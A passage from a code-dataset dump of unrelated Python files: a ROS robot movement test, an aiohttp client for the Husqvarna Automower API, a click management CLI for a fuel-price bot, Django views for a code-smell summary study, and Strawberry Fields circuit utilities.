square_side = 1.0\n rbkairos_movement.check_movement(delta_x=square_side)\n rbkairos_movement.check_movement(delta_x=-1*square_side)\n rbkairos_movement.check_movement(delta_y=square_side)\n rbkairos_movement.check_movement(delta_y=-1*square_side)\n rbkairos_movement.check_movement(delta_angular=1.57)\n rbkairos_movement.check_movement(delta_angular=-1.57)\n\n\ndef move_square_test():\n rospy.init_node('talker', anonymous=True, log_level=rospy.DEBUG)\n rbkairos_movement = RBKairosMover()\n\n square_side = 0.5\n\n rbkairos_movement.move_rbkairos(dir=\"forwards\", distance=square_side)\n rbkairos_movement.move_rbkairos(dir=\"left\", distance=square_side)\n rbkairos_movement.move_rbkairos(dir=\"backwards\", distance=square_side)\n rbkairos_movement.move_rbkairos(dir=\"right\", distance=square_side)\n\n\nif __name__ == '__main__':\n try:\n 
move_square_test()\n except rospy.ROSInterruptException:\n pass","sub_path":"test_drives/src/omni_drive.py","file_name":"omni_drive.py","file_ext":"py","file_size_in_byte":8017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"130102374","text":"\"\"\"Automower library using aiohttp.\"\"\"\nimport logging\nimport time\nfrom urllib.parse import quote_plus, urlencode\n\nimport aiohttp\n\n_LOGGER = logging.getLogger(__name__)\n\n\nAUTH_API_URL = \"https://api.authentication.husqvarnagroup.dev/v1/oauth2/token\"\nTOKEN_URL = \"https://api.authentication.husqvarnagroup.dev/v1/token\"\nAUTH_HEADERS = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Accept\": \"application/json\",\n}\n\nMOWER_API_BASE_URL = \"https://api.amc.husqvarna.dev/v1/mowers/\"\n\ntimeout = aiohttp.ClientTimeout(total=10)\n\n\nclass TokenError(Exception):\n \"\"\"Raised when Husqvarna Authentication API request ended in error 400.\"\"\"\n\n def __init__(self, status: str):\n \"\"\"Initialize.\"\"\"\n super().__init__(status)\n self.status = status\n\n\nclass TokenRefreshError(Exception):\n \"\"\"Raised when Husqvarna Authentication API is not able to refresh the token (Error 400 or 404).\"\"\"\n\n def __init__(self, status: str):\n \"\"\"Initialize.\"\"\"\n super().__init__(status)\n self.status = status\n\n\nclass TokenValidationError(Exception):\n \"\"\"Raised when Husqvarna Authentication API token request ended in error 404. The reason might be an invalid token or that a refresh is needed\"\"\"\n\n def __init__(self, status: str):\n \"\"\"Initialize.\"\"\"\n super().__init__(status)\n self.status = status\n\n\nclass GetAccessToken:\n \"\"\"Class to get an acces token from the Authentication API.\"\"\"\n\n def __init__(self, api_key, username, password):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.username = username\n self.password = password\n self.api_key = api_key\n self.auth_data = urlencode(\n {\n \"client_id\": self.api_key,\n \"grant_type\": \"password\",\n \"username\": self.username,\n \"password\": self.password,\n },\n quote_via=quote_plus,\n )\n\n async def async_get_access_token(self):\n \"\"\"Return the token.\"\"\"\n async with aiohttp.ClientSession(headers=AUTH_HEADERS) as session:\n async with session.post(AUTH_API_URL, data=self.auth_data) as resp:\n _LOGGER.debug(\"Resp.status get access token: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n result[\"expires_at\"] = result[\"expires_in\"] + time.time()\n if resp.status >= 400:\n raise TokenError(\n f\"The token is invalid, respone from Husqvarna Automower API: {resp.status}\"\n )\n result[\"status\"] = resp.status\n return result\n\n\nclass RefreshAccessToken:\n \"\"\"Class to renew the Access Token.\"\"\"\n\n def __init__(self, api_key, refresh_token):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.api_key = api_key\n self.refresh_token = refresh_token\n self.auth_data = urlencode(\n {\n \"client_id\": self.api_key,\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": self.refresh_token,\n },\n quote_via=quote_plus,\n )\n\n async def async_refresh_access_token(self):\n \"\"\"Return the refresh token.\"\"\"\n async with aiohttp.ClientSession(headers=AUTH_HEADERS) as session:\n async with session.post(AUTH_API_URL, data=self.auth_data) as resp:\n _LOGGER.debug(\"Resp.status refresh token: %i\", resp.status)\n if resp.status == 200:\n result = await 
class RefreshAccessToken:\n \"\"\"Class to renew the Access Token.\"\"\"\n\n def __init__(self, api_key, refresh_token):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.api_key = api_key\n self.refresh_token = refresh_token\n self.auth_data = urlencode(\n {\n \"client_id\": self.api_key,\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": self.refresh_token,\n },\n quote_via=quote_plus,\n )\n\n async def async_refresh_access_token(self):\n \"\"\"Return the refresh token.\"\"\"\n async with aiohttp.ClientSession(headers=AUTH_HEADERS) as session:\n async with session.post(AUTH_API_URL, data=self.auth_data) as resp:\n _LOGGER.debug(\"Resp.status refresh token: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n result[\"expires_at\"] = result[\"expires_in\"] + time.time()\n result[\"status\"] = resp.status\n return result\n elif resp.status in [400, 401, 404]:\n raise TokenRefreshError(\n f\"The token cannot be refreshed, response from Husqvarna Automower API: {resp.status}\"\n )\n\n\nclass ValidateAccessToken:\n \"\"\"Class to validate the Access Token.\"\"\"\n\n def __init__(self, api_key, access_token, provider):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.api_key = api_key\n self.access_token = access_token\n self.provider = provider\n self.token_url = f\"{TOKEN_URL}/{self.access_token}\"\n self.token_headers = {\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"Accept\": \"application/json\",\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n }\n\n async def async_validate_access_token(self):\n \"\"\"Return information about the current token.\"\"\"\n async with aiohttp.ClientSession(headers=self.token_headers) as session:\n async with session.get(self.token_url) as resp:\n _LOGGER.debug(\"Resp.status validate token: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n if resp.status == 404:\n raise TokenValidationError(\n f\"The token is probably expired or invalid, response from Husqvarna Automower API: {resp.status}\"\n )\n result[\"status\"] = resp.status\n return result\n\n\nclass GetMowerData:\n \"\"\"Class to communicate with the Automower Connect API.\"\"\"\n\n def __init__(self, api_key, access_token, provider, token_type):\n \"\"\"Initialize the Communication API to get data.\"\"\"\n self.api_key = api_key\n self.access_token = access_token\n self.provider = provider\n self.token_type = token_type\n self.mower_headers = {\n \"Authorization\": \"{0} {1}\".format(self.token_type, self.access_token),\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"Content-Type\": \"application/vnd.api+json\",\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n }\n\n async def async_mower_state(self):\n \"\"\"Return the mowers data as a list of mowers.\"\"\"\n async with aiohttp.ClientSession(\n headers=self.mower_headers, timeout=timeout\n ) as session:\n async with session.get(MOWER_API_BASE_URL) as resp:\n _LOGGER.debug(\"Resp.status mower data: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n if resp.status >= 400:\n resp.raise_for_status()\n result[\"status\"] = resp.status\n return result\n\n\n
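# Hedged polling sketch (editor's addition; the token fields passed in are\n# assumptions based on the constructor above, not confirmed API fields):\n#\n# api = GetMowerData(api_key, token[\"access_token\"], token[\"provider\"], token[\"token_type\"])\n# mowers = await api.async_mower_state() # dict with the mower list plus a \"status\" entry\n\n\n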
class Return:\n \"\"\"Class to send commands to the Automower Connect API.\"\"\"\n\n def __init__(self, api_key, access_token, provider, token_type, mower_id, payload):\n \"\"\"Initialize the API and store the auth so we can send commands.\"\"\"\n self.api_key = api_key\n self.access_token = access_token\n self.provider = provider\n self.token_type = token_type\n self.mower_id = mower_id\n self.mower_headers = {\n \"Authorization\": \"{0} {1}\".format(self.token_type, self.access_token),\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"Content-Type\": \"application/vnd.api+json\",\n \"accept\": \"*/*\",\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n }\n self.mower_action_url = f\"{MOWER_API_BASE_URL}{self.mower_id}/actions\"\n self.payload = payload\n\n async def async_mower_command(self):\n \"\"\"Send a payload to the mower to execute a command.\"\"\"\n async with aiohttp.ClientSession(headers=self.mower_headers) as session:\n async with session.post(self.mower_action_url, data=self.payload) as resp:\n # the context managers close the session; only the status code is returned\n _LOGGER.debug(\"Sent payload: %s\", self.payload)\n _LOGGER.debug(\"Resp status mower command: %s\", resp.status)\n return resp.status\n\n\nclass DeleteAccessToken:\n \"\"\"Class to invalidate an access token.\"\"\"\n\n def __init__(self, api_key, provider, access_token):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.api_key = api_key\n self.provider = provider\n self.delete_headers = {\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n \"Accept\": \"application/json\",\n }\n self.access_token = access_token\n self.delete_url = f\"{TOKEN_URL}/{self.access_token}\"\n\n async def async_delete_access_token(self):\n \"\"\"Delete the token.\"\"\"\n async with aiohttp.ClientSession(headers=self.delete_headers) as session:\n async with session.delete(self.delete_url) as resp:\n _LOGGER.debug(\"Resp.status delete token: %i\", resp.status)\n if resp.status >= 400:\n resp.raise_for_status()\n # a successful delete answers 204 No Content, so there is no JSON body to parse\n return resp.status\n","sub_path":"aioautomower/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":9040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"481654442","text":"import click\nimport click_repl\n\n\n@click.group(invoke_without_command=True)\n@click.pass_context\ndef cli(ctx):\n if ctx.invoked_subcommand is None:\n ctx.invoke(repl)\n\n\n@cli.command()\n@click.argument('what')\n@click.option('--deamon', is_flag=True)\n@click.option('--check', is_flag=True)\ndef run(what, deamon, check):\n \"\"\" application entry point \"\"\"\n if check:\n from database.database_manupulation import create_all\n create_all()\n if what == 'bot':\n if deamon:\n import subprocess\n with open('bot_log', 'w') as fd:\n p = subprocess.Popen(['python', 'manage.py', 'run', 'bot'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n print(p.pid)\n else:\n from bots.telegram_bot import main\n main()\n elif what == 'flask':\n if deamon:\n import subprocess\n with open('flask_log', 'w') as fd:\n p = subprocess.Popen(['python', 'manage.py', 'run', 'flask'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n print(p.pid)\n else:\n from stella_api.app import app\n app.run(host='0.0.0.0', port=5000)\n elif what == 'all':\n import subprocess\n with open('bot_log', 'w') as fd:\n p1 = subprocess.Popen(['python', 'manage.py', 'run', 'bot'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n with open('flask_log', 'w') as fd:\n p2 = subprocess.Popen(['python', 'manage.py', 'run', 'flask'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n if not deamon:\n print('running')\n p1.wait()\n p2.wait()\n else:\n print(p1.pid)\n print(p2.pid)\n else:\n print(f'option not recognized: {what}')\n\n\n@cli.command()\ndef show_schema():\n \"\"\" describes database schema \"\"\"\n from database.models import Base\n for table in Base.metadata.tables.values():\n print(table.name)\n fks = Base.metadata.tables[table.name].foreign_keys\n fks = {i.target_fullname.replace('.', '_'): i.column for i in fks}\n for column in table.c:\n if column.name in fks:\n print(' ', column.name, 'foreign key to', fks[column.name])\n else:\n print(' ', column.name, column.type)\n print()\n\n\n@cli.command()\ndef create():\n \"\"\" creates table(s) \"\"\"\n from database.database_manupulation import create_all\n create_all()\n\n\n
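# Illustrative invocations of this management script (editor's addition):\n#\n# python manage.py create # create all tables\n# python manage.py fixture # load seed data\n# python manage.py run bot --deamon # start the bot detached (flag spelling as defined above)\n\n\n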
@cli.command()\ndef fixture():\n \"\"\" load seed fuel companies and fuel types \"\"\"\n from database.models import Fuel, FuelCompany\n from database.queries import session_scope\n with session_scope() as session:\n for company_name in ['Юкон', 'Брсм']:\n session.add(FuelCompany(fuel_company_name=company_name))\n session.commit()\n for fuel, is_premium in [('95+', False),\n ('95E', True),\n ('92', False),\n ('ДП+', False),\n ('ДП', False),\n ('ГАЗ', False),\n ('95', False)]:\n session.add(Fuel(fuel_type=fuel, is_premium=is_premium))\n session.commit()\n\n\n@cli.command()\n@click.option('--all', is_flag=True)\n@click.option('--tables')\ndef truncate(all, tables):\n \"\"\" truncates table(s) \"\"\"\n if all:\n from database.database_manupulation import truncate_all_tables\n truncate_all_tables()\n elif tables:\n from database.database_manupulation import truncate_tables\n truncate_tables(*tables.split(','))\n\n\n@cli.command()\n@click.option('--all', is_flag=True)\n@click.option('--tables')\ndef drop(all, tables):\n \"\"\" drops table(s) \"\"\"\n if all:\n from database.database_manupulation import drop_all_tables\n drop_all_tables()\n elif tables:\n from database.database_manupulation import drop_tables\n drop_tables(*tables.split(','))\n\n\n@cli.command()\ndef fake():\n \"\"\" create fake instances in database \"\"\"\n import random\n from itertools import chain\n from faker import Faker\n from database.queries import get_or_create\n from database.db_connection import session_maker\n from database.models import (User, FuelCompany, Fuel, GasStation, Images,\n Price)\n\n fake = Faker()\n session = session_maker()\n\n tg_uids = random.sample(list(range(10_000)), 5)\n users = [get_or_create(session, User, tg_id=uid) for uid in tg_uids]\n\n fuel_company_names = [fake.company() for _ in range(3)]\n companies = [get_or_create(session, FuelCompany, fuel_company_name=n)\n for n in fuel_company_names]\n\n fuel_marks = ['92', '98', '95', '80']\n fuels = [get_or_create(session, Fuel, fuel_type=f, is_premium=False)\n for f in fuel_marks]\n\n addresses = [fake.address() for _ in range(10)]\n gas_stations = [get_or_create(session, GasStation, address=a,\n fuel_company_id=random.choice(companies).id)\n for a in addresses]\n\n links = [fake.image_url(width=500, height=400) for _ in range(10)]\n recognized = [fake.pybool() for _ in range(10)]\n metadata = [fake.pybool() for _ in range(10)]\n images = [get_or_create(session, Images, link=l, is_recognized=r,\n is_from_metadata=m)\n for l, r, m in zip(links, recognized, metadata)]\n\n prices = [get_or_create(session, Price, price=random.uniform(0, 99),\n gas_station_id=random.choice(gas_stations).id,\n fuel_id=random.choice(fuels).id,\n images_id=i.id)\n for i in images]\n\n for entity in chain(users, companies, fuels, gas_stations, images, prices):\n session.add(entity)\n\n session.commit()\n\n\n@cli.command()\ndef repl():\n click_repl.repl(click.get_current_context())\n\n\n@cli.command()\ndef help():\n print('run - runs application\\n'\n 'show-schema - describes database schema\\n'\n 'create - creates table(s)\\n'\n 'truncate - truncates table(s)\\n'\n 'drop - drops table(s)\\n'\n 'fake - fill database with fake records')\n\n\nif __name__ == '__main__':\n cli(obj={})\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"506667426","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views import generic\nfrom .models import *\nfrom django.contrib.auth.decorators import 
login_required\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.template.defaulttags import register\n# Create your views here.\n\n\n@login_required\ndef index(request):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # the user has finished the experiment, show nothing\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summaries = Summary.objects.filter(experiment__id=user_subject.experiment.id)\n answers = []\n for summary in summaries:\n answers.append({\"summary\":summary, \"answer\":summary.answer(request.user)})\n context = {'answers': answers}\n return render(request, 'summaries/index.html', context)\n\n\n@login_required\ndef smells_relevance(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # the user has finished the experiment, show nothing\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n answer = summary.answer(request.user)\n smells_instances = summary.codesmellinstance_set.all()\n\n for sinstance in smells_instances:\n smell_answer = get_smell_answer(answer, sinstance)\n sinstance.was_important = smell_answer.was_important\n\n context = {'summary': summary,\n 'answer': answer,\n 'smells_instances': smells_instances}\n return render(request, 'summaries/smells_relevance.html', context)\n\n\n@login_required\ndef all_smells(request):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # the user has finished the experiment, show nothing\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n smells = CodeSmell.objects.order_by('name')\n context = {'smells': smells}\n return render(request, 'summaries/all_smells.html', context)\n\n\n@login_required\ndef design_problems(request):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # the user has finished the experiment, show nothing\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n problems = DesignProblem.objects.order_by('name')\n context = {'design_problems': problems}\n return render(request, 'summaries/design_problems.html', context)\n\n\n@login_required\ndef save_smells_relevance(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # the user has finished the experiment, show nothing\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n if summary.experiment.id != user_subject.experiment.id:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n answer = summary.answer(request.user)\n if answer is None:\n return HttpResponseRedirect(reverse('summaries:details', kwargs={'summary_id': summary_id}))\n\n for sinstance in summary.codesmellinstance_set.all():\n smell_answer = get_smell_answer(answer, sinstance)\n was_important = request.POST[\"was_important_%s\" % sinstance.id] == 'True'\n smell_answer.was_important = was_important\n smell_answer.save()\n\n return HttpResponseRedirect(reverse('summaries:index'))\n\n\n@register.filter\ndef get_item(dictionary, key):\n if len(dictionary[key]) == 0:\n return 'Nenhuma anomalia encontrada'\n return \", \".join(list(dictionary.get(key)))\n\n\n
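# Editor's note (hedged sketch, not wired into the views): the repeated\n# \"finished experiment\" guard above and below could be factored into a\n# decorator; the name require_active_experiment is illustrative only.\n#\n# from functools import wraps\n#\n# def require_active_experiment(view):\n# @wraps(view)\n# def wrapper(request, *args, **kwargs):\n# subject = UserSubject.objects.get(user__id=request.user.id)\n# if not subject.on_experiment:\n# return HttpResponseRedirect(reverse('summaries:the_end'))\n# return view(request, *args, **kwargs)\n# return wrapper\n\n\n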
@login_required\ndef details(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # the user has finished the experiment, show nothing\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n if summary.experiment.id != user_subject.experiment.id:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n answer = summary.answer(request.user)\n smells_instances = summary.codesmellinstance_set.all()\n if answer:\n # for each user, check whether they marked the instance as a smell or not\n for instance in smells_instances:\n result = SummaryAnswerCodeSmell.objects.filter(summary_answer__id=answer.id, instance__id=instance.id)\n if result:\n instance.opinion = result[0].opinion\n else:\n answer = SummaryAnswer()\n\n similar_by_smell = []\n if not summary.experiment.type.is_complete:\n similar_by_smell = summary.similar_by_smell(request.user)\n\n opinions = CodeSmellOpinion.objects.all()\n summary.parse_agglomerations()\n context = {'summary': summary,\n 'answer':answer,\n 'smells_instances':smells_instances,\n 'importance': SummaryAnswer.IMPORTANCE,\n 'opinions': opinions,\n 'similar_by_smell': similar_by_smell}\n return render(request, 'summaries/detail.html', context)\n\n\ndef get_smell_answer(answer, instance):\n result = SummaryAnswerCodeSmell.objects.filter(summary_answer__id=answer.id, instance__id=instance.id)\n if result:\n return result[0]\n else:\n sacs = SummaryAnswerCodeSmell()\n sacs.summary_answer = answer\n sacs.instance = instance\n return sacs\n\n\n@login_required\ndef save(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # the user has finished the experiment, show nothing\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n if summary.experiment.id != user_subject.experiment.id:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n answer = summary.answer(request.user)\n if answer is None:\n answer = SummaryAnswer()\n answer.user = request.user\n answer.summary = summary\n answer.agglomeration_rating = request.POST.get('rel_aglomeracao', None)\n answer.design_patterns_rating = request.POST.get('rel_dpatterns', None)\n answer.smells_rating = request.POST.get('rel_smells', None)\n answer.design_principles_rating = request.POST.get('rel_dprinciples', None)\n answer.examples_rating = request.POST.get('rel_examples', None)\n answer.non_functional_ratings = request.POST.get('rel_nonfunc', None)\n answer.observations = request.POST.get('observations', '')\n answer.save()\n\n if not summary.experiment.type.is_complete:\n for sinstance in summary.codesmellinstance_set.all():\n smell_answer = get_smell_answer(answer, sinstance)\n opinion_id = request.POST[\"smell_opinion_%s\" % sinstance.id]\n opinion = get_object_or_404(CodeSmellOpinion, pk=opinion_id)\n smell_answer.opinion = opinion\n smell_answer.save()\n\n s_rating = answer.smells_rating\n if summary.experiment.type.is_complete and s_rating is not None and s_rating != '0':\n return HttpResponseRedirect(reverse('summaries:smells_relevance', kwargs={'summary_id': summary_id}))\n else:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n\n@login_required\ndef the_end(request):\n return render(request, 'summaries/the_end.html')\n\n\n@login_required\ndef finish(request):\n subject = UserSubject.objects.get(user__id=request.user.id)\n subject.on_experiment = False\n subject.save()\n return 
HttpResponseRedirect(reverse('summaries:the_end'))","sub_path":"summaries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"456103324","text":"# Copyright 2019 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis module contains various utility classes and functions used\nwithin the :class:`~.Program` class.\n\"\"\"\n\nfrom collections.abc import Sequence\n\nimport networkx as nx\n\nfrom .parameters import MeasuredParameter\n\n\n__all__ = [\n \"Program_current_context\",\n \"RegRefError\",\n \"CircuitError\",\n \"MergeFailure\",\n \"Command\",\n \"RegRef\",\n \"list_to_grid\",\n \"grid_to_DAG\",\n \"DAG_to_list\",\n \"list_to_DAG\",\n \"group_operations\",\n \"optimize_circuit\",\n]\n\n\nProgram_current_context = None\n\"\"\"Context for inputting a Program. Used to be a class attribute of :class:`.Program`, placed\nhere to avoid cyclic imports.\"\"\"\n# todo: Avoid issues with Program contexts and threading,\n# cf. _pydecimal.py in the python standard distribution.\n\n\nclass RegRefError(IndexError):\n \"\"\"Exception raised by :class:`.Program` when it encounters an invalid register reference.\n\n E.g., trying to apply a gate to a nonexistent or deleted subsystem.\n \"\"\"\n\n\nclass CircuitError(RuntimeError):\n \"\"\"Exception raised by :class:`.Program` when it encounters an illegal\n operation in the quantum circuit.\n\n E.g., trying to use an Operation type that is unsupported by the current compilation target.\n \"\"\"\n\n\nclass MergeFailure(RuntimeError):\n \"\"\"Exception raised by :meth:`strawberryfields.ops.Operation.merge` when an\n attempted merge fails.\n\n E.g., trying to merge two gates of different families.\n \"\"\"\n\n\nclass Command:\n \"\"\"Represents a quantum operation applied on specific subsystems of the register.\n\n A Command instance is immutable once created, and can be shared between\n several :class:`.Program` instances.\n\n Args:\n op (~strawberryfields.ops.Operation): quantum operation to apply\n reg (Sequence[RegRef]): Subsystems to which the operation is applied.\n Note that the order matters here.\n \"\"\"\n\n # pylint: disable=too-few-public-methods\n\n def __init__(self, op, reg):\n # accept a single RegRef in addition to a Sequence\n if not isinstance(reg, Sequence):\n reg = [reg]\n\n #: Operation: quantum operation to apply\n self.op = op\n #: Sequence[RegRef]: subsystems to which the operation is applied\n self.reg = reg\n\n def __str__(self):\n \"\"\"\n Return a string containing the command in Blackbird syntax.\n \"\"\"\n\n operation = str(self.op)\n if self.op.ns == 0:\n # op takes no subsystems as parameters, do not print anything more\n code = operation\n else:\n subsystems = \", \".join([str(r) for r in self.reg])\n code = \"{} | ({})\".format(operation, subsystems)\n return code\n\n def __lt__(self, other):\n # Needed as a tiebreaker for NetworkX 
lexicographical_topological_sort()\n # due to a buggy implementation! Any order will do. Remove when NetworkX is fixed.\n return True\n\n def get_dependencies(self):\n \"\"\"Subsystems the command depends on.\n\n Combination of ``self.reg`` and ``self.op.measurement_deps``.\n\n .. note:: ``measurement_deps`` are used to ensure that the measurement\n happens before the result is used, but this is a bit too strict:\n two gates depending on the same measurement result but otherwise\n acting on different subsystems should commute.\n\n Returns:\n set[RegRef]: set of subsystems the command depends on\n \"\"\"\n deps = self.op.measurement_deps | set(self.reg)\n return deps\n\n\nclass RegRef:\n \"\"\"Quantum register reference.\n\n The objects of this class refer to a specific subsystem (mode) of\n a quantum register.\n\n Within the scope of each :class:`.Program` instance, only one RegRef instance\n should exist per subsystem. Program keeps the authoritative mapping\n of subsystem indices to RegRef instances.\n Subsystem measurement results are stored in the \"official\" RegRef object.\n If other RegRef objects referring to the same subsystem exist, they will\n not be updated. Once a RegRef is assigned a subsystem index it will never\n change, not even if the subsystem is deleted.\n\n The RegRefs are constructed in :meth:`.Program._add_subsystems`.\n\n Args:\n ind (int): index of the register subsystem referred to\n \"\"\"\n\n # pylint: disable=too-few-public-methods\n\n def __init__(self, ind):\n self.ind = ind #: int: subsystem index\n self.val = None #: float, complex: Measurement result. None if the subsystem has not been measured yet.\n self.active = True #: bool: True at construction, False after the subsystem is deleted\n\n def __str__(self):\n return \"q[{}]\".format(self.ind)\n\n def __hash__(self):\n \"\"\"Hashing method.\n\n NOTE: Has to match :meth:`__eq__` such that if two RegRefs compare equal they must have equal hashes.\n \"\"\"\n return hash((self.ind, self.active))\n\n def __eq__(self, other):\n \"\"\"Equality comparison.\n\n Compares the index and the activity state of the two RegRefs, the val field does not matter.\n NOTE: Affects the hashability of RegRefs, see also :meth:`__hash__`.\n \"\"\"\n if other.__class__ != self.__class__:\n print(\"--------------- regref.__eq__: compared reqref to \", other.__class__)\n return False\n return self.ind == other.ind and self.active == other.active\n\n @property\n def par(self):\n \"\"\"Convert the RegRef into a measured parameter.\n\n Returns:\n MeasuredParameter: measured parameter linked to this RegRef\n \"\"\"\n return MeasuredParameter(self)\n\n\n# =================\n# Utility functions\n# =================\n\n\ndef list_to_grid(ls):\n \"\"\"Transforms a list of Commands to a grid representation.\n\n The grid is a mapping from subsystem indices to lists of :class:`Command` instances touching\n that subsystem, in temporal order. 
The same Command instance will appear in each list that\n corresponds to one of its subsystems.\n\n Args:\n ls (Iterable[Command]): quantum circuit\n Returns:\n dict[int, list[Command]]: same circuit in grid form\n \"\"\"\n grid = {}\n # enter every operation in the list to its proper position in the grid\n for cmd in ls:\n for r in cmd.get_dependencies():\n # Add cmd to the grid to the end of the line r.ind.\n grid.setdefault(r.ind, []).append(cmd)\n return grid\n\n\ndef grid_to_DAG(grid):\n \"\"\"Transforms a grid of Commands to a DAG representation.\n\n In the DAG (directed acyclic graph) each node is a :class:`Command` instance,\n and edges point from Commands to their immediate dependents/followers.\n\n Args:\n grid (dict[int, list[Command]]): quantum circuit\n Returns:\n networkx.DiGraph[Command]: same circuit in DAG form\n \"\"\"\n DAG = nx.DiGraph()\n for _, q in grid.items():\n if q:\n # add the first operation on the wire that does not depend on anything\n DAG.add_node(q[0])\n for i in range(1, len(q)):\n # add the edge between the operations, and the operation nodes themselves\n DAG.add_edge(q[i - 1], q[i])\n return DAG\n\n\ndef list_to_DAG(ls):\n \"\"\"Transforms a list of Commands to a DAG representation.\n\n In the DAG (directed acyclic graph) each node is a :class:`Command` instance,\n and edges point from Commands to their immediate dependents/followers.\n\n Args:\n ls (Iterable[Command]): quantum circuit\n Returns:\n networkx.DiGraph[Command]: same circuit in DAG form\n \"\"\"\n return grid_to_DAG(list_to_grid(ls))\n\n\ndef DAG_to_list(dag):\n \"\"\"Transforms a Command DAG to a list representation.\n\n The list contains the :class:`Command` instances in (one possible) topological order,\n i.e., dependants following the operations they depend on.\n\n Args:\n dag (networkx.DiGraph[Command]): quantum circuit\n Returns:\n list[Command]: same circuit in list form\n \"\"\"\n # sort the operation graph into topological order\n temp = nx.algorithms.dag.topological_sort(dag)\n return list(temp)\n\n\ndef group_operations(seq, predicate):\n \"\"\"Group a set of Operations in a circuit together (if possible).\n\n For the purposes of this method, we call a :class:`Operation` instance *marked* iff\n ``predicate`` returns True on it.\n\n This method converts the quantum circuit in ``seq`` into an equivalent circuit ``A+B+C``,\n where the :class:`Command` instances in sequences ``A`` and ``C`` do not contain any\n marked Operations.\n The sequence ``B`` contains all marked Operations in the circuit, and possibly\n additional unmarked instances that could not be moved into ``A`` or ``C`` using the\n available commutation rules.\n Any of the three returned sequences can be empty (but if ``B`` is empty then so is ``C``).\n\n Args:\n seq (Sequence[Command]): quantum circuit\n predicate (Callable[[Operation], bool]): Grouping predicate. 
